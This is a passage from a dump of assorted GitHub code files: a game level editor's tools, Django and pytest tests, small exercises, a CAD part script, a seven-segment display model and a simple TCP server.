pos2):\n return Door(pos1, pos2, [])\n\nclass GrillTool(SegmentTool):\n name = 'Grill'\n def _make_segment(self, pos1, pos2):\n return Grill(pos1, pos2)\n\nclass PortalTool(Tool):\n def setup(self):\n self.pos1 = None\n\n def mousedown(self, x, y):\n self.pos1 = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n\n def mousemove(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(x, y)\n self.canvas.redraw()\n if self.pos1.pos() != pos2.pos():\n portal = self._make_portal(self.pos1, pos2)\n portal.draw(self.canvas)\n\n def mouseup(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(x, y)\n if self.pos1.pos() != pos2.pos():\n portal = self._make_portal(self.pos1, pos2)\n self.level.add_entity(portal)\n self.canvas.redraw()\n self.pos1 = None\n\n def _closest_position(self, x, y):\n x = round(x * 2) * 0.5\n y = round(y * 2) * 0.5\n if x == self.pos1.x and y == self.pos1.y:\n return Position(x, y)\n if abs(x - self.pos1.x) > abs(y - self.pos1.y):\n if x > self.pos1.x:\n return Position(self.pos1.x + 1, self.pos1.y)\n else:\n return Position(self.pos1.x - 1, self.pos1.y)\n else:\n if y > self.pos1.y:\n return Position(self.pos1.x, self.pos1.y + 1)\n else:\n return Position(self.pos1.x, self.pos1.y - 1)\n\n def _make_portal(self, pos1, pos2):\n raise NotImplementedError\n\nclass Portal1Tool(PortalTool):\n name = 'Orange portal'\n def 
_make_portal(self, pos1, pos2):\n return Portal(pos1, pos2, 'portal1')\n\nclass Portal2Tool(PortalTool):\n name = 'Blue portal'\n def _make_portal(self, pos1, pos2):\n return Portal(pos1, pos2, 'portal2')\n\nclass CubeTool(Tool):\n name = 'Cube'\n def mousedown(self, x, y):\n cube = Cube(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.add_entity(cube)\n self.canvas.redraw()\n\nclass ButtonTool(Tool):\n name = 'Button'\n def mousedown(self, x, y):\n button = Button(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.add_entity(button)\n self.canvas.redraw()\n\nclass TriggerTool(Tool):\n name = 'Connect door to button'\n def setup(self):\n self.door = None\n self.button = None\n\n def mousedown(self, x, y):\n door = self._get_door(x, y)\n button = self._get_button(x, y)\n if door and button:\n if door.center().distance(Position(x, y)) < button.distance(Position(x, y)):\n self.door = door\n else:\n self.button = button\n elif door:\n self.door = door\n elif button:\n self.button = button\n\n def mousemove(self, x, y):\n if self.door:\n self.canvas.redraw()\n button = self._get_button(x, y)\n if button:\n self._draw_trigger(self.door.center(), button)\n else:\n self._draw_trigger(self.door.center(), Position(x, y))\n elif self.button:\n self.canvas.redraw()\n door = self._get_door(x, y)\n if door:\n self._draw_trigger(self.button, door.center())\n else:\n self._draw_trigger(self.button, Position(x, y))\n\n def mouseup(self, x, y):\n if self.door:\n button = self._get_button(x, y)\n if button and button not in self.door.triggers:\n self.door.triggers.append(button)\n elif self.button:\n door = self._get_door(x, y)\n if door and self.button not in door.triggers:\n door.triggers.append(self.button)\n self.door = None\n self.button = None\n self.canvas.redraw()\n\n def _draw_trigger(self, pos1, pos2):\n self.canvas.create_line(pos1.x, pos1.y, pos2.x, pos2.y,\n width=2.0,\n dash=(8, 8),\n fill=colors.TRIGGER)\n\n def _get_door(self, x, y):\n for wall in self.level.walls:\n if isinstance(wall, Door) and wall.center().distance(Position(x, y)) < 0.5:\n return wall\n\n def _get_button(self, x, y):\n for entity in self.level.entities:\n if isinstance(entity, Button) and entity.distance(Position(x, y)) < 0.5:\n return entity\n\nclass EraserTool(Tool):\n name = 'Eraser'\n def setup(self):\n self.last_x = None\n self.last_y = None\n\n def mousedown(self, x, y):\n self._remove_entities(x, y)\n self.canvas.redraw()\n self.last_x = x\n self.last_y = y\n\n def mousemove(self, x, y):\n if self.last_x is not None and self.last_y is not None:\n self._remove_entities(x, y)\n self._remove_walls(self.last_x, self.last_y, x, y)\n self.canvas.redraw()\n self.last_x = x\n self.lats_y = y\n\n def mouseup(self, x, y):\n self.last_x = None\n self.last_y = None\n\n def _remove_entities(self, x, y):\n to_remove = []\n for e in self.level.entities:\n if e.x is not None and e.y is not None and e.distance(Position(x, y)) < 0.2:\n to_remove.append(e)\n for e in to_remove:\n self.level.remove_entity(e)\n\n def _remove_walls(self, x1, y1, x2, y2):\n to_remove = []\n for wall in self.level.walls:\n if wall.intersects(Position(x1, y1), Position(x2, y2)):\n to_remove.append(wall)\n for wall in to_remove:\n self.level.walls.remove(wall)\n\n\n\nTOOLS = [\n PlayerTool,\n GoalTool,\n WallTool,\n PortalWallTool,\n LedgeTool,\n DoorTool,\n GrillTool,\n Portal1Tool,\n Portal2Tool,\n CubeTool,\n ButtonTool,\n TriggerTool,\n 
EraserTool,\n]\n","repo_name":"michaelelin/portal_planner","sub_path":"portal/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":8387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4262653398","text":"import glob\nimport inspect\nimport os.path\nimport pytest\nimport re\nimport shutil\n\nfrom publicprize import debug as ppd\nfrom publicprize import config\nfrom publicprize.debug import pp_t\n\n_request_logger = None\n\n_expect = {\n 'environ': 'some environ',\n 'status': 'some status',\n 'response_headers': 'some headers',\n 'response_data': 'some write',\n 'other': 'hello'\n}\n\ndef _init_debug(test_mode, regex):\n ppd._request_logger = None\n ppd._trace_printer = None\n ppd._app = None\n mock = MockApp()\n mock.config = {\n 'PUBLICPRIZE': {\n 'TRACE': regex,\n 'TEST_MODE': test_mode}}\n ppd.init(mock)\n return mock\n\nclass MockApp(object):\n \n def __init__(self):\n self.wsgi_app = self\n self.called__call__ = 0\n \n def __call__(self, environ, start_response):\n global _expect\n global _request_logger\n self.called__call__ += 1\n start_response(_expect['status'], _expect['response_headers'])\n return _expect['response_data']\n\ndef test_nothing():\n global _request_logger\n mock = _init_debug(0, None)\n assert mock.wsgi_app == mock\n \ndef test_log():\n global _expect\n global _request_logger\n if os.path.exists('debug'):\n shutil.rmtree('debug')\n os.mkdir('debug')\n called_start_response = 0\n mock = _init_debug(1, None)\n _request_logger = ppd.get_request_logger()\n def start_response(status, response_headers, exc_info=None):\n nonlocal called_start_response\n called_start_response += 1\n \n def assert_file(index, suffix):\n name = os.path.join('debug', index + '-' + suffix)\n assert os.path.exists(name), name\n with open(name, 'r') as f:\n actual = f.read()\n assert actual == _expect[suffix], suffix + '=' + actual\n\n response = mock.wsgi_app(_expect['environ'], start_response)\n assert '00000003-response_headers' in _request_logger.last_file_name()\n _request_logger.set_log_dir('new_dir')\n for ignore in response:\n pass\n assert '00000001-response_data' in _request_logger.last_file_name() \n response.close()\n _request_logger.log('hello', 'other')\n\n assert mock.called__call__ == 1\n assert called_start_response == 1\n assert_file('00000001', 'environ')\n assert_file('00000002', 'status')\n assert_file('00000003', 'response_headers')\n assert_file('new_dir/00000001', 'response_data')\n assert_file('new_dir/00000002', 'other')\n _request_logger.log('not written', 'invalid/suffix')\n assert list(glob.glob('debug/*invalid*')) == [], 'found invalid/suffix'\n\ndef test_trace():\n _last_msg = None\n def _init(regex):\n nonlocal _last_msg\n _last_msg = None\n _init_debug(0, regex)\n ppd._trace_printer.write = _write\n\n def _write(msg):\n nonlocal _last_msg\n _last_msg = msg\n\n def expect(msg):\n return './tests/test_debug.py:{}:test_trace {}\\n'.format(inspect.currentframe().f_back.f_lineno - 1, msg)\n\n _init(None)\n pp_t('hello')\n assert None == _last_msg\n\n _init('.')\n pp_t('hello')\n assert expect('hello') == _last_msg \n pp_t('x{}x', ['y'])\n assert expect('xyx') == _last_msg \n\n _init('goodbye')\n pp_t('hello')\n assert None == _last_msg \n pp_t('goodbye')\n assert expect('goodbye') == _last_msg \n \n","repo_name":"biviosoftware/publicprize","sub_path":"tests/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4045944195","text":"\"\"\"\nAquest mòdul serveix per descomprimir l'arxiu twitter_reduced.zip\n\"\"\"\n\nimport os\nimport glob\nimport zipfile\nimport csv\n\n\ndef decompress_data():\n \"\"\"\n Funció per descomprimir l'arxiu twitter_reduced.zip\n Return: twitter_reduced.csv\n \"\"\"\n\n # Definim el directori al arxiu per descomprimir\n zip_files = glob.glob('./data/twitter_reduced.zip')\n if zip_files:\n zip_file = zip_files[0]\n directory = os.path.dirname(zip_file)\n\n # Descomprimim l'arxiu i el guardem a la carpeta data\n with zipfile.ZipFile(zip_file, 'r') as z:\n z.extractall(directory)\n\n print(\"L'arxiu s'ha descomprimit i guardat a la carpeta data\")\n\n\ndef csv_to_list_dict(path_to_file):\n \"\"\"\n Funció per passar un csv a una llista de diccionaris.\n :param path_to_file: Arxiu csv com a input.\n :return: Llista de diccionaris.\n \"\"\"\n # Creem una llista buida\n list_dict = []\n\n # Obrim l'arxiu i el llegim\n with open(path_to_file, 'r', newline='', encoding='utf-8') as f:\n reader = csv.DictReader(f)\n\n # Iterem per cada línia, la passem a diccionari i l'afegim a la llista\n for row in reader:\n list_dict.append(dict(row))\n return list_dict\n","repo_name":"vtierz/pec4","sub_path":"dataset/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24451528309","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n# @Author : xuan\n中位数是一个可将数值集合划分为相等的上下两部分的一个数值。\n如果列表数据的个数是奇数,则列表中间那个数据就是列表数据的中位数;\n如果列表数据的个数是偶数,则列表中间那2个数据的算术平均值就是列表数据的中位数。\n在这个任务里,你将得到一个含有自然数的非空数组(X)。你必须把它分成上下两部分,找到中位数。\n\"\"\"\n\ndef checkio(data):\n new_data = sorted(data)\n if len(data) % 2 != 0:\n return new_data[int(len(data)/2)]\n else:\n return (new_data[len(data)//2 -1] + new_data[len(data)//2])/2\n\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio([1, 2, 3, 4, 5]) == 3, \"Sorted list\"\n assert checkio([3, 1, 2, 5, 3]) == 3, \"Not sorted list\"\n assert checkio([1, 300, 2, 200, 1]) == 2, \"It's not an average\"\n assert checkio([3, 6, 20, 99, 10, 15]) == 12.5, \"Even length\"\n print(\"Start the long test\")\n assert checkio(list(range(1000000))) == 499999.5, \"Long.\"\n print(\"The local tests are done.\")\n print(checkio([1, 2, 3, 4, 5, 6]))","repo_name":"kxeg/checkio","sub_path":"checkio/Median.py","file_name":"Median.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72598424488","text":"# Problem #1026\n# Author: Dalton Lima @daltonbr\n# 07/04/17\n# https://www.urionlinejudge.com.br/judge/en/problems/view/1026\n\nimport fileinput\n\nfor line in fileinput.input():\n #print(\"line read: \", line)\n value_list = line.split()\n\n # Converting str to int ... with list comprehension\n int_list = line.split()\n int_list = [int(i) for i in int_list]\n\n # ... or we could user map function also\n # int_list = list(map(int, int_list))\n\n # it's a simple bitwise xor (operator ^)\n print(int_list[0] ^ int_list[1])\n","repo_name":"daltonbr/problems","sub_path":"_URI/1026-ToCarryOrNotToCarry/carry.py","file_name":"carry.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6388199832","text":"# tests.py\n# from django.test import TestCase\nfrom django.urls import reverse\nimport pytest\nfrom pytest_django.asserts import assertTemplateUsed # assertQuerysetEqual\nfrom .models import MyUser, Note\n\n\n# Test on correct Routing page:\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_login_route(client):\n response = client.get(reverse(\"login\"))\n assert response.status_code == 200\n assertTemplateUsed(response, \"login.html\")\n assert b\"Register\" in response.content\n\n\n# Test on single Note for User:\n@pytest.mark.django_db\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_user_have_single_note(client):\n # Create a User in DB\n single_note_user = MyUser.objects.create(\n name=\"User1\", password=\"cryptography_staff_123\", language=\"Polish\", grade=\"Low\"\n )\n\n # Create the User Note in DB:\n new_note = Note.objects.create(\n user_note=single_note_user,\n title=\"Test Note\",\n msg=\"This is a test note\",\n assignee=\"Test User\",\n e_mail=\"Test_Email@ithillel.ua\",\n )\n\n # Access the user's notes page:\n response = client.get(reverse(\"user_info\", kwargs={\"username\": new_note.user_note}))\n assert response.status_code == 200\n assertTemplateUsed(response, \"admin_user_info.html\")\n\n # Check if the note is present in the response:\n assert new_note.title in response.content.decode()\n\n # We are on page: http://127.0.0.1:8000/users/John/\n # Only user info here and Note titles\n\n\n# Test on three Notes for User:\n@pytest.mark.django_db\n@pytest.mark.urls(\"scheduler.urls\")\ndef test_user_have_3_notes(client):\n # Create a user in DB:\n multi_note_user = MyUser.objects.create(\n name=\"David\",\n password=\"cryptography_staff_321\",\n language=\"Esperanto\",\n grade=\"Medium\",\n )\n\n # Create a User Note1 in DB:\n new_note1 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Holiday Plans\",\n msg=\"Sunbathe on a beach\",\n assignee=\"Evan Tree\",\n e_mail=\"Test_Email1@ithillel.ua\",\n )\n\n # Create a User Note2 in DB:\n new_note2 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Morning Routine\",\n msg=\"Walk a Dog\",\n assignee=\"Chris Newdawn\",\n e_mail=\"Test_Email2@ithillel.ua\",\n )\n\n # Create a User Note3 in DB:\n new_note3 = Note.objects.create(\n user_note=multi_note_user,\n title=\"Animal Care\",\n msg=\"Give Meds\",\n assignee=\"Samanta Hopper\",\n e_mail=\"Test_Email3@ithillel.ua\",\n )\n\n # Access the user's notes page (\"username\" is same for all 3):\n multi_response = client.get(\n reverse(\"user_info\", kwargs={\"username\": new_note1.user_note})\n )\n assert multi_response.status_code == 200\n assertTemplateUsed(multi_response, \"admin_user_info.html\")\n\n # Check if all 3 notes are present in the response:\n assert (\n new_note1.title and new_note2.title and new_note3.title\n ) in multi_response.content.decode()\n\n # We are on page: http://127.0.0.1:8000/users/David/\n # Only user info here and Note titles\n","repo_name":"Northman94/PyProZh","sub_path":"Lesson10/organizer10/scheduler/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"20030927569","text":"import numpy as np\nimport pandas as pd\nfrom computecost import computecost\nfrom computecost import sigmoid\ndef gradientDesent(X,y,alpha,num_iter):\n \"\"\"X为特征矩阵,y为标签数组,theta为角度,alpha为学习效率,num_iters为所迭代的次数,\n 此函数为梯度算法,返回最小角度和代价函数矩阵\"\"\"\n m, n = X.shape # 样本总量\n theta = np.zeros((n, 1))\n m=len(y)#样本总量\n theta=theta.reshape(-1,1)\n J_history=np.zeros((num_iter,1))#将代价函数矩阵初始为零矩阵\n for iter in range(num_iter):\n s=sigmoid(np.dot(X,theta))#调用sigmoid函数\n theta=theta-alpha*np.dot(X.T,(s-y))/m#梯度函数应用\n J_history[iter][0]=computecost(s,y)#调用代价函数,每次迭代的结果写入,更新矩阵值\n return theta,J_history\n","repo_name":"karagg/tt","sub_path":"logistic/gradientDesent.py","file_name":"gradientDesent.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9880575717","text":"import pandas as pd\n\nfrom dagster import MaterializeResult, MetadataValue, asset\n\n# start_add_signsup_asset\nfrom .resources import DataGeneratorResource\n\n# ...\n\n\n@asset\ndef signups(hackernews_api: DataGeneratorResource) -> MaterializeResult:\n signups = pd.DataFrame(hackernews_api.get_signups())\n\n signups.to_csv(\"data/signups.csv\")\n\n return MaterializeResult(\n metadata={\n \"Record Count\": len(signups),\n \"Preview\": MetadataValue.md(signups.head().to_markdown()),\n \"Earliest Signup\": signups[\"registered_at\"].min(),\n \"Latest Signup\": signups[\"registered_at\"].max(),\n }\n )\n\n\n# end_add_signsup_asset\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/tutorial/connecting/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"}
+{"seq_id":"70549139689","text":"from typing import Dict\n\n\nclass DisplaySegment(object):\n ON_STR_HORIZ = \"===\"\n OFF_STR_HORIZ = \"___\"\n ON_STR_VERT = \"B\"\n OFF_STR_VERT = \"|\"\n\n def __init__(self):\n self.anode = True # type: bool\n self.cathodes = {chr(c): False for c in range(ord('a'), ord('f') + 1)} # type: Dict[str: bool]\n self.cathodes[\"dp\"] = False\n\n def __repr__(self):\n r = \".%s.\\n%s...%s\\n%s...%s\\n.%s%s\" % \\\n (self.ON_STR_HORIZ if self.cathodes[\"a\"] else self.OFF_STR_HORIZ,\n self.ON_STR_VERT if self.cathodes[\"f\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"b\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"e\"] else self.OFF_STR_VERT,\n self.ON_STR_VERT if self.cathodes[\"c\"] else self.OFF_STR_VERT,\n self.ON_STR_HORIZ if self.cathodes[\"a\"] else self.OFF_STR_HORIZ,\n \"*\" if self.cathodes[\"dp\"] else \".\")\n return r\n\n\nclass SevenSegmentDisplay(object):\n def __init__(self):\n self.segments = [DisplaySegment() for _ in range(0, 8)]\n","repo_name":"Vadman97/PicoSim","sub_path":"hardware_sim/seven_segment_display.py","file_name":"seven_segment_display.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"33172266248","text":"import supalib\n\nEPS = 0.01\nTOLE = 0.2\n\nBUMBER_STICK_SEPARATION = 30\nBUMBER_STICK_XSIZE = 10\nBUMBER_STICK_YSIZE = 10\nBUMBER_STICK_LEN = 120\n\nMOUNT_B_OFFSET = -70\nMOUNT_THICKNESS = 4\nMOUNT_YSIZE = 30\nMOUNT_STIC_SIZE = 2*MOUNT_THICKNESS + BUMBER_STICK_YSIZE\n\n\ndef crete_single_mount( with_hole ):\n raw = supalib.create_box( size=(MOUNT_STIC_SIZE , MOUNT_YSIZE , MOUNT_STIC_SIZE ), place = (0, 0, 0 ) )\n \n if with_hole == False:\n offset_y = -EPS\n else:\n offset_y = MOUNT_THICKNESS*0.5\n \n hole = supalib.create_box( size=( BUMBER_STICK_XSIZE + 2*TOLE, MOUNT_YSIZE + 2*EPS, BUMBER_STICK_YSIZE + 2*TOLE ), place = (MOUNT_THICKNESS - TOLE, offset_y, MOUNT_THICKNESS - TOLE) )\n return supalib.create_cut( raw, hole )\n\ndef create_base_mount():\n raw = supalib.create_box( place=(-BUMBER_STICK_SEPARATION - EPS, -EPS,-TOLE), size=( 2*BUMBER_STICK_SEPARATION + 2*EPS, MOUNT_YSIZE + 2*EPS, MOUNT_THICKNESS ) )\n BOLT_SEP = MOUNT_YSIZE/4.0\n hole1 = supalib.create_cyl( place=(0, MOUNT_YSIZE*0.5 + BOLT_SEP, -1.0), radius=1.5 + TOLE, size_z=10)\n hole2 = supalib.create_cyl( place=(0, MOUNT_YSIZE*0.5 - BOLT_SEP, -1.0), radius=1.5 + TOLE, size_z=10)\n holes = supalib.create_union( (hole1, hole2 ) )\n return supalib.create_cut( raw, holes )\n\n\ndef create_full_part( with_hole, label ):\n base = create_base_mount() \n mount_1 = crete_single_mount( with_hole )\n mount_2 = crete_single_mount( with_hole )\n supalib.relocate( mount_1, place=( BUMBER_STICK_SEPARATION - MOUNT_STIC_SIZE, 0, -EPS ) )\n supalib.relocate( mount_2, place=( -BUMBER_STICK_SEPARATION, 0, -EPS ) )\n mount = supalib.create_union( ( mount_1, mount_2, base ) )\n mount.Label = label\n return mount\n\nSTICK_PLACE_A=(BUMBER_STICK_SEPARATION - MOUNT_STIC_SIZE + (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5 - TOLE*0.0 , MOUNT_B_OFFSET + 10.0, MOUNT_THICKNESS )\nSTICK_PLACE_B=(-BUMBER_STICK_SEPARATION + (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5 + TOLE*0.0, MOUNT_B_OFFSET + 10.0, MOUNT_THICKNESS )\ndef create_stick():\n thick = (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5\n bsize = BUMBER_STICK_XSIZE - 2 *TOLE\n b1 = supalib.create_box( size=( bsize, BUMBER_STICK_LEN, bsize), place =STICK_PLACE_A )\n b2 = supalib.create_box( size=( bsize, BUMBER_STICK_LEN, bsize), place =STICK_PLACE_B )\n b3 = supalib.create_box( size=( 2*BUMBER_STICK_SEPARATION - 2*EPS - MOUNT_STIC_SIZE + bsize*0.25, bsize, bsize), place=( bsize*0.25 + -BUMBER_STICK_SEPARATION + thick + EPS, -BUMBER_STICK_XSIZE - TOLE, MOUNT_THICKNESS ) )\n b1 = supalib.create_fillet( b1 )\n b2 = supalib.create_fillet( b2 )\n part = supalib.create_union( ( b1,b2,b3) )\n part.Label = \"Stick\"\n return part\n\ndef create_bumber():\n BUMBER_SIZE_MINUS = 60 + BUMBER_STICK_SEPARATION\n BUMBER_SIZE_PLUS = 30 + BUMBER_STICK_SEPARATION\n BUMBER_MOUNT_SIZE = BUMBER_STICK_XSIZE + 2*MOUNT_THICKNESS + TOLE\n def create_bmount():\n raw = supalib.create_box( size=( BUMBER_MOUNT_SIZE, MOUNT_THICKNESS, BUMBER_MOUNT_SIZE) )\n hole = supalib.create_box( size=( BUMBER_STICK_XSIZE + 2*TOLE, MOUNT_THICKNESS*0.5, BUMBER_STICK_XSIZE + 2*TOLE ), place=(MOUNT_THICKNESS - TOLE, 0.0, MOUNT_THICKNESS - TOLE) )\n return supalib.create_cut( raw, hole )\n\n m1 = create_bmount()\n m2 = create_bmount()\n \n s0 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,2*BUMBER_MOUNT_SIZE + MOUNT_THICKNESS) )\n s1 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), 
place=(-BUMBER_SIZE_MINUS,0,BUMBER_MOUNT_SIZE - EPS ) )\n s2 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,-MOUNT_THICKNESS - EPS) )\n s3 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n hsize = ( MOUNT_THICKNESS, MOUNT_THICKNESS, 3*(MOUNT_THICKNESS + BUMBER_MOUNT_SIZE) + MOUNT_THICKNESS + EPS )\n d1 = supalib.create_box( size=hsize, place=(-BUMBER_SIZE_MINUS,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d2 = supalib.create_box( size=hsize, place=( BUMBER_SIZE_PLUS - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n d3 = supalib.create_box( size=hsize, place=( -BUMBER_STICK_SEPARATION - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d4 = supalib.create_box( size=hsize, place=( -BUMBER_STICK_SEPARATION + BUMBER_MOUNT_SIZE ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d5 = supalib.create_box( size=hsize, place=( BUMBER_STICK_SEPARATION ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d6 = supalib.create_box( size=hsize, place=( BUMBER_STICK_SEPARATION - BUMBER_MOUNT_SIZE - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n \n d7 = supalib.create_box( size=hsize, place=( 0.5*( -BUMBER_STICK_SEPARATION - MOUNT_THICKNESS - BUMBER_SIZE_MINUS) ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n #d5 = supalib.create_box( size=hsize, place=( 2*BUMBER_STICK_SEPARATION ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n #d6 = supalib.create_box( size=hsize, place=( 2*BUMBER_STICK_SEPARATION -BUMBER_MOUNT_SIZE -MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n\n sup = supalib.create_union( (s0, s1,s2,s3,d1,d2,d3, d4, d5, d6, d7 ) )\n # ,d5,d6\n supalib.relocate( m1, place=(STICK_PLACE_A[0] - MOUNT_THICKNESS, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n supalib.relocate( m2, place=(STICK_PLACE_B[0] - MOUNT_THICKNESS, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n supalib.relocate( sup, place=(0.0, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n bumber = supalib.create_union( (sup, m1, m2 ) )\n bumber.Label=\"Bumber\"\n return bumber\n \n \nbumber = create_bumber() \nmount_a = create_full_part ( False, \"Mount_front\" )\nmount_b = create_full_part ( True, \"Mount_rear\" )\nsupalib.relocate( mount_b, place=( 0.0, MOUNT_B_OFFSET , 0.0) )\n\nstick = create_stick()\n\n\nfor x in [ bumber, mount_a, mount_b, stick ]:\n supalib.creta_mesh_from( x )\n\nsupalib.finish()\n\n\n\n\n","repo_name":"susundberg/zephyr-robot-supa2019","sub_path":"3d_parts/robot_bumber_mount_a.py","file_name":"robot_bumber_mount_a.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"17111691253","text":"#!/usr/bin/env python3\n# *_* coding: utf-8 *_*\n\n\"\"\"TCP Server library\"\"\"\n\nimport socket\nimport select\nimport time\nimport getmac\n\nclass new_connection(Exception):\n \"\"\"TCP: New connection detected\"\"\"\n pass\n\nclass address_does_not_exist(Exception):\n \"\"\"TCP: Address does exist in dictionary\"\"\"\n def __init__(self, *args):\n super().__init__(*args)\n\ndef get_ip():\n \"\"\"Find local IP of the current network interface, avoid 127.0.0.1\"\"\"\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # doesn't even have to be reachable\n s.connect(('10.255.255.255', 1))\n IP = s.getsockname()[0]\n except:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\n\ndef receive_message(client_socket):\n \"\"\"Recive message from client_socket\"\"\"\n try:\n mess = client_socket.recv(1024)\n if (not len(mess)):\n return False\n elif (len(mess) <= 2) or (mess == '\\r\\n'):\n return\n return mess\n \n except:\n return False\n\nclass tcp_server:\n \"\"\"Create a TCP/IP Server\"\"\"\n def __init__(self,IP,PORT):\n self.IP = IP\n self.PORT = PORT\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setblocking(0)\n self.server_socket.bind((self.IP, self.PORT))\n self.server_socket.listen(5)\n self.sockets_list = [self.server_socket]\n self.socket_list_by_mac = {}\n self.id_dict = {}\n self.msg = {}\n self.read_sockets = []\n self.write_sockets = []\n self.exception_sockets = []\n self.mac_list = []\n \n\n def update_sockets_list(self):\n \"\"\"Update sockets list to read_sockets, write_sockets, exception_sockets\"\"\"\n self.read_sockets, self.write_sockets, self.exception_sockets = select.select(self.sockets_list, self.sockets_list, [], 0)\n\n def check_read_sockets(self):\n \"\"\"Handle new connection after updating socket lists\"\"\" \n for notified_socket in self.read_sockets:\n if notified_socket == self.server_socket:\n raise new_connection('New Connection')\n\n def new_socket_handler(self):\n \"\"\"New socket handler\"\"\"\n client_socket, client_address = self.server_socket.accept()\n client_mac = getmac.get_mac_address(ip = client_address[0], network_request=True)\n client_socket.setblocking(0)\n self.sockets_list.append(client_socket)\n logic = True\n for mac in self.mac_list:\n if mac == client_mac:\n client_socket.send(b\"Welcome back!\")\n logic = False\n try:\n self.sockets_list.remove(self.socket_list_by_mac[mac])\n except ValueError:\n pass\n self.socket_list_by_mac[mac]=client_socket\n return\n\n if logic:\n raise address_does_not_exist(client_socket, client_address)\n\n def create_new_socket(self, client_socket, client_address, id):\n \"\"\"Create new TCP socket\"\"\"\n client_mac = getmac.get_mac_address(ip = client_address[0], network_request=True)\n self.id_dict[client_mac] = id\n self.mac_list.append(client_mac)\n self.socket_list_by_mac[client_mac] = client_socket\n \n def send_all(self, mess):\n \"\"\"THIS FUNCTION IS WRONG\"\"\"\n for key in self.id_dict:\n if (self.id_dict[key] != 'UPS') and (self.id_dict[key] != 'AC') and (key != self.server_socket):\n key.send(mess.encode('utf-8'))\n\n def therm_parsing(self, mess):\n \"\"\"Split a message from a client into 2 variables by spaces\"\"\"\n mess_list = mess.split()\n if len(mess_list) == 2:\n return mess_list[0], mess_list[1]\n\n def recv_all(self):\n \"\"\"Receive all messages from clients and parse as therm\"\"\"\n self.update_sockets_list()\n return_list = []\n for notified_socket in self.read_sockets:\n if 
